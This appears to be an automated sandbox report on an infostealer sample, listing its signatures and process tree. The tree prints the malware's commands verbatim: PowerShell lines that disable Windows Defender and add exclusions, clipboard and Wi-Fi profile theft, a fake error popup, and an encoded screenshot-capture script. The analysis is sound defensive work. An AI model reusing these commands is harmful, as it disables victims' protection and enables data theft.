Analysis
-
max time kernel
95s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
27-12-2024 04:07
Behavioral task
behavioral1
Sample
Account Method.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Account Method.exe
Resource
win10v2004-20241007-en
General
-
Target
Account Method.exe
-
Size
6.0MB
-
MD5
533098d68bed52f271ccacc2ff9b90dc
-
SHA1
9c73399366c258bc43f0a64f2caef51cc60a6df1
-
SHA256
369b6cecb9a25012323387c19abe99e8c82370f22c941172949c2458d8f4f2a2
-
SHA512
5d3138178bcf2c2fa1d80a2ad09b3e4af7a58386c60c85ad7d32c3460c40294eb1f1ca9ba10cc76f87e4152c235b33829534bc04320fa1ab62489a0b4069989a
-
SSDEEP
98304:xIEtdFBgwBamaHl3Ne4i3gmtfXJOLhx9fZAzDJ4wzQgsRuGK4RsPMEB3JdMDTD:xvFmeN/FJMIDJf0gsAGK4RskEKDTD
Malware Config
Signatures
-
pid Process 760 powershell.exe 836 powershell.exe 3004 powershell.exe 2560 powershell.exe 3940 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 2880 cmd.exe 3092 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 5068 rar.exe -
Loads dropped DLL 16 IoCs
pid Process 4900 Account Method.exe 4900 Account Method.exe 4900 Account Method.exe 4900 Account Method.exe 4900 Account Method.exe 4900 Account Method.exe 4900 Account Method.exe 4900 Account Method.exe 4900 Account Method.exe 4900 Account Method.exe 4900 Account Method.exe 4900 Account Method.exe 4900 Account Method.exe 4900 Account Method.exe 4900 Account Method.exe 4900 Account Method.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 24 discord.com 25 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 16 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 3720 tasklist.exe 3008 tasklist.exe 1960 tasklist.exe 1728 tasklist.exe -
resource yara_rule behavioral2/files/0x0008000000023bca-21.dat upx behavioral2/memory/4900-25-0x00007FF96A8E0000-0x00007FF96AD4E000-memory.dmp upx behavioral2/files/0x000a000000023b9f-27.dat upx behavioral2/memory/4900-30-0x00007FF97D660000-0x00007FF97D684000-memory.dmp upx behavioral2/memory/4900-48-0x00007FF97F9F0000-0x00007FF97F9FF000-memory.dmp upx behavioral2/files/0x000a000000023bad-47.dat upx behavioral2/files/0x000b000000023ba5-46.dat upx behavioral2/files/0x000b000000023ba4-45.dat upx behavioral2/files/0x000b000000023ba3-44.dat upx behavioral2/files/0x000a000000023ba2-43.dat upx behavioral2/files/0x000a000000023ba1-42.dat upx behavioral2/files/0x000a000000023ba0-41.dat upx behavioral2/files/0x000a000000023b9e-40.dat upx behavioral2/files/0x0008000000023bff-39.dat upx behavioral2/files/0x0008000000023bd0-38.dat upx behavioral2/files/0x0008000000023bcf-37.dat upx behavioral2/files/0x0009000000023bc4-34.dat upx behavioral2/files/0x0009000000023bc2-33.dat upx behavioral2/files/0x0009000000023bc3-29.dat upx behavioral2/memory/4900-56-0x00007FF97A1B0000-0x00007FF97A1C9000-memory.dmp upx behavioral2/memory/4900-55-0x00007FF97A470000-0x00007FF97A49D000-memory.dmp upx behavioral2/memory/4900-60-0x00007FF979780000-0x00007FF9798F1000-memory.dmp upx behavioral2/memory/4900-59-0x00007FF97A190000-0x00007FF97A1AF000-memory.dmp upx behavioral2/memory/4900-62-0x00007FF979F00000-0x00007FF979F19000-memory.dmp upx behavioral2/memory/4900-72-0x00007FF9799D0000-0x00007FF979A88000-memory.dmp upx behavioral2/memory/4900-71-0x00007FF97D660000-0x00007FF97D684000-memory.dmp upx behavioral2/memory/4900-70-0x00007FF96A230000-0x00007FF96A5A5000-memory.dmp upx behavioral2/memory/4900-68-0x00007FF979E90000-0x00007FF979EBE000-memory.dmp upx behavioral2/memory/4900-67-0x00007FF96A8E0000-0x00007FF96AD4E000-memory.dmp upx behavioral2/memory/4900-64-0x00007FF97D4F0000-0x00007FF97D4FD000-memory.dmp upx behavioral2/memory/4900-74-0x00007FF97D730000-0x00007FF97D744000-memory.dmp upx behavioral2/memory/4900-76-0x00007FF97A2D0000-0x00007FF97A2DD000-memory.dmp upx behavioral2/memory/4900-78-0x00007FF97A1B0000-0x00007FF97A1C9000-memory.dmp upx behavioral2/memory/4900-79-0x00007FF979B60000-0x00007FF979C78000-memory.dmp upx behavioral2/memory/4900-105-0x00007FF97A190000-0x00007FF97A1AF000-memory.dmp upx behavioral2/memory/4900-106-0x00007FF979780000-0x00007FF9798F1000-memory.dmp upx behavioral2/memory/4900-183-0x00007FF979F00000-0x00007FF979F19000-memory.dmp upx behavioral2/memory/4900-244-0x00007FF979E90000-0x00007FF979EBE000-memory.dmp upx behavioral2/memory/4900-245-0x00007FF96A230000-0x00007FF96A5A5000-memory.dmp upx behavioral2/memory/4900-264-0x00007FF9799D0000-0x00007FF979A88000-memory.dmp upx behavioral2/memory/4900-290-0x00007FF97A190000-0x00007FF97A1AF000-memory.dmp upx behavioral2/memory/4900-291-0x00007FF979780000-0x00007FF9798F1000-memory.dmp upx behavioral2/memory/4900-285-0x00007FF96A8E0000-0x00007FF96AD4E000-memory.dmp upx behavioral2/memory/4900-286-0x00007FF97D660000-0x00007FF97D684000-memory.dmp upx behavioral2/memory/4900-300-0x00007FF96A8E0000-0x00007FF96AD4E000-memory.dmp upx behavioral2/memory/4900-320-0x00007FF97A190000-0x00007FF97A1AF000-memory.dmp upx behavioral2/memory/4900-324-0x00007FF979E90000-0x00007FF979EBE000-memory.dmp upx behavioral2/memory/4900-323-0x00007FF97D4F0000-0x00007FF97D4FD000-memory.dmp upx behavioral2/memory/4900-322-0x00007FF979F00000-0x00007FF979F19000-memory.dmp upx behavioral2/memory/4900-321-0x00007FF979780000-0x00007FF9798F1000-memory.dmp upx behavioral2/memory/4900-319-0x00007FF9799D0000-0x00007FF979A88000-memory.dmp upx behavioral2/memory/4900-318-0x00007FF97A470000-0x00007FF97A49D000-memory.dmp upx behavioral2/memory/4900-317-0x00007FF97F9F0000-0x00007FF97F9FF000-memory.dmp upx behavioral2/memory/4900-316-0x00007FF97D660000-0x00007FF97D684000-memory.dmp upx behavioral2/memory/4900-315-0x00007FF97A1B0000-0x00007FF97A1C9000-memory.dmp upx behavioral2/memory/4900-314-0x00007FF979B60000-0x00007FF979C78000-memory.dmp upx behavioral2/memory/4900-313-0x00007FF97A2D0000-0x00007FF97A2DD000-memory.dmp upx behavioral2/memory/4900-312-0x00007FF97D730000-0x00007FF97D744000-memory.dmp upx behavioral2/memory/4900-310-0x00007FF96A230000-0x00007FF96A5A5000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 2896 cmd.exe 760 netsh.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4020 WMIC.exe 544 WMIC.exe 3900 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 3296 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 760 powershell.exe 2560 powershell.exe 760 powershell.exe 2560 powershell.exe 3940 powershell.exe 3940 powershell.exe 3092 powershell.exe 3092 powershell.exe 4696 powershell.exe 4696 powershell.exe 4696 powershell.exe 3092 powershell.exe 836 powershell.exe 836 powershell.exe 1440 powershell.exe 1440 powershell.exe 3004 powershell.exe 3004 powershell.exe 4316 powershell.exe 4316 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3720 tasklist.exe Token: SeIncreaseQuotaPrivilege 2772 WMIC.exe Token: SeSecurityPrivilege 2772 WMIC.exe Token: SeTakeOwnershipPrivilege 2772 WMIC.exe Token: SeLoadDriverPrivilege 2772 WMIC.exe Token: SeSystemProfilePrivilege 2772 WMIC.exe Token: SeSystemtimePrivilege 2772 WMIC.exe Token: SeProfSingleProcessPrivilege 2772 WMIC.exe Token: SeIncBasePriorityPrivilege 2772 WMIC.exe Token: SeCreatePagefilePrivilege 2772 WMIC.exe Token: SeBackupPrivilege 2772 WMIC.exe Token: SeRestorePrivilege 2772 WMIC.exe Token: SeShutdownPrivilege 2772 WMIC.exe Token: SeDebugPrivilege 2772 WMIC.exe Token: SeSystemEnvironmentPrivilege 2772 WMIC.exe Token: SeRemoteShutdownPrivilege 2772 WMIC.exe Token: SeUndockPrivilege 2772 WMIC.exe Token: SeManageVolumePrivilege 2772 WMIC.exe Token: 33 2772 WMIC.exe Token: 34 2772 WMIC.exe Token: 35 2772 WMIC.exe Token: 36 2772 WMIC.exe Token: SeDebugPrivilege 760 powershell.exe Token: SeIncreaseQuotaPrivilege 2772 WMIC.exe Token: SeSecurityPrivilege 2772 WMIC.exe Token: SeTakeOwnershipPrivilege 2772 WMIC.exe Token: SeLoadDriverPrivilege 2772 WMIC.exe Token: SeSystemProfilePrivilege 2772 WMIC.exe Token: SeSystemtimePrivilege 2772 WMIC.exe Token: SeProfSingleProcessPrivilege 2772 WMIC.exe Token: SeIncBasePriorityPrivilege 2772 WMIC.exe Token: SeCreatePagefilePrivilege 2772 WMIC.exe Token: SeBackupPrivilege 2772 WMIC.exe Token: SeRestorePrivilege 2772 WMIC.exe Token: SeShutdownPrivilege 2772 WMIC.exe Token: SeDebugPrivilege 2772 WMIC.exe Token: SeSystemEnvironmentPrivilege 2772 WMIC.exe Token: SeRemoteShutdownPrivilege 2772 WMIC.exe Token: SeUndockPrivilege 2772 WMIC.exe Token: SeManageVolumePrivilege 2772 WMIC.exe Token: 33 2772 WMIC.exe Token: 34 2772 WMIC.exe Token: 35 2772 WMIC.exe Token: 36 2772 WMIC.exe Token: SeDebugPrivilege 2560 powershell.exe Token: SeIncreaseQuotaPrivilege 4020 WMIC.exe Token: SeSecurityPrivilege 4020 WMIC.exe Token: SeTakeOwnershipPrivilege 4020 WMIC.exe Token: SeLoadDriverPrivilege 4020 WMIC.exe Token: SeSystemProfilePrivilege 4020 WMIC.exe Token: SeSystemtimePrivilege 4020 WMIC.exe Token: SeProfSingleProcessPrivilege 4020 WMIC.exe Token: SeIncBasePriorityPrivilege 4020 WMIC.exe Token: SeCreatePagefilePrivilege 4020 WMIC.exe Token: SeBackupPrivilege 4020 WMIC.exe Token: SeRestorePrivilege 4020 WMIC.exe Token: SeShutdownPrivilege 4020 WMIC.exe Token: SeDebugPrivilege 4020 WMIC.exe Token: SeSystemEnvironmentPrivilege 4020 WMIC.exe Token: SeRemoteShutdownPrivilege 4020 WMIC.exe Token: SeUndockPrivilege 4020 WMIC.exe Token: SeManageVolumePrivilege 4020 WMIC.exe Token: 33 4020 WMIC.exe Token: 34 4020 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3228 wrote to memory of 4900 3228 Account Method.exe 82 PID 3228 wrote to memory of 4900 3228 Account Method.exe 82 PID 4900 wrote to memory of 3244 4900 Account Method.exe 83 PID 4900 wrote to memory of 3244 4900 Account Method.exe 83 PID 4900 wrote to memory of 2400 4900 Account Method.exe 84 PID 4900 wrote to memory of 2400 4900 Account Method.exe 84 PID 4900 wrote to memory of 1812 4900 Account Method.exe 85 PID 4900 wrote to memory of 1812 4900 Account Method.exe 85 PID 4900 wrote to memory of 2248 4900 Account Method.exe 86 PID 4900 wrote to memory of 2248 4900 Account Method.exe 86 PID 4900 wrote to memory of 4056 4900 Account Method.exe 91 PID 4900 wrote to memory of 4056 4900 Account Method.exe 91 PID 2248 wrote to memory of 3720 2248 cmd.exe 93 PID 2248 wrote to memory of 3720 2248 cmd.exe 93 PID 4056 wrote to memory of 2772 4056 cmd.exe 94 PID 4056 wrote to memory of 2772 4056 cmd.exe 94 PID 3244 wrote to memory of 2560 3244 cmd.exe 95 PID 3244 wrote to memory of 2560 3244 cmd.exe 95 PID 2400 wrote to memory of 760 2400 cmd.exe 96 PID 2400 wrote to memory of 760 2400 cmd.exe 96 PID 1812 wrote to memory of 644 1812 cmd.exe 97 PID 1812 wrote to memory of 644 1812 cmd.exe 97 PID 4900 wrote to memory of 4256 4900 Account Method.exe 99 PID 4900 wrote to memory of 4256 4900 Account Method.exe 99 PID 4256 wrote to memory of 3408 4256 cmd.exe 101 PID 4256 wrote to memory of 3408 4256 cmd.exe 101 PID 4900 wrote to memory of 5100 4900 Account Method.exe 102 PID 4900 wrote to memory of 5100 4900 Account Method.exe 102 PID 5100 wrote to memory of 4040 5100 cmd.exe 104 PID 5100 wrote to memory of 4040 5100 cmd.exe 104 PID 4900 wrote to memory of 4888 4900 Account Method.exe 105 PID 4900 wrote to memory of 4888 4900 Account Method.exe 105 PID 4888 wrote to memory of 4020 4888 cmd.exe 107 PID 4888 wrote to memory of 4020 4888 cmd.exe 107 PID 4900 wrote to memory of 3948 4900 Account Method.exe 108 PID 4900 wrote to memory of 3948 4900 Account Method.exe 108 PID 3948 wrote to memory of 544 3948 cmd.exe 110 PID 3948 wrote to memory of 544 3948 cmd.exe 110 PID 4900 wrote to memory of 3412 4900 Account Method.exe 111 PID 4900 wrote to memory of 3412 4900 Account Method.exe 111 PID 3412 wrote to memory of 3940 3412 cmd.exe 113 PID 3412 wrote to memory of 3940 3412 cmd.exe 113 PID 4900 wrote to memory of 2388 4900 Account Method.exe 114 PID 4900 wrote to memory of 2388 4900 Account Method.exe 114 PID 4900 wrote to memory of 3196 4900 Account Method.exe 115 PID 4900 wrote to memory of 3196 4900 Account Method.exe 115 PID 3196 wrote to memory of 3008 3196 cmd.exe 118 PID 3196 wrote to memory of 3008 3196 cmd.exe 118 PID 2388 wrote to memory of 1960 2388 cmd.exe 119 PID 2388 wrote to memory of 1960 2388 cmd.exe 119 PID 4900 wrote to memory of 968 4900 Account Method.exe 120 PID 4900 wrote to memory of 968 4900 Account Method.exe 120 PID 4900 wrote to memory of 2880 4900 Account Method.exe 121 PID 4900 wrote to memory of 2880 4900 Account Method.exe 121 PID 4900 wrote to memory of 732 4900 Account Method.exe 124 PID 4900 wrote to memory of 732 4900 Account Method.exe 124 PID 4900 wrote to memory of 932 4900 Account Method.exe 162 PID 4900 wrote to memory of 932 4900 Account Method.exe 162 PID 4900 wrote to memory of 2896 4900 Account Method.exe 127 PID 4900 wrote to memory of 2896 4900 Account Method.exe 127 PID 4900 wrote to memory of 4416 4900 Account Method.exe 128 PID 4900 wrote to memory of 4416 4900 Account Method.exe 128 PID 4900 wrote to memory of 1228 4900 Account Method.exe 132 PID 4900 wrote to memory of 1228 4900 Account Method.exe 132
Processes
-
C:\Users\Admin\AppData\Local\Temp\Account Method.exe"C:\Users\Admin\AppData\Local\Temp\Account Method.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Users\Admin\AppData\Local\Temp\Account Method.exe"C:\Users\Admin\AppData\Local\Temp\Account Method.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Account Method.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Account Method.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Outdated, Please Download Latest Version!', 0, 'Error!', 0+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Outdated, Please Download Latest Version!', 0, 'Error!', 0+16);close()"4⤵PID:644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4256 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:3408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:4040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:4020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:3412 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3196 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:968
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:3876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:2880 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:3092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:732
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:932
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2896 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:4416
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:3296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:1228
-
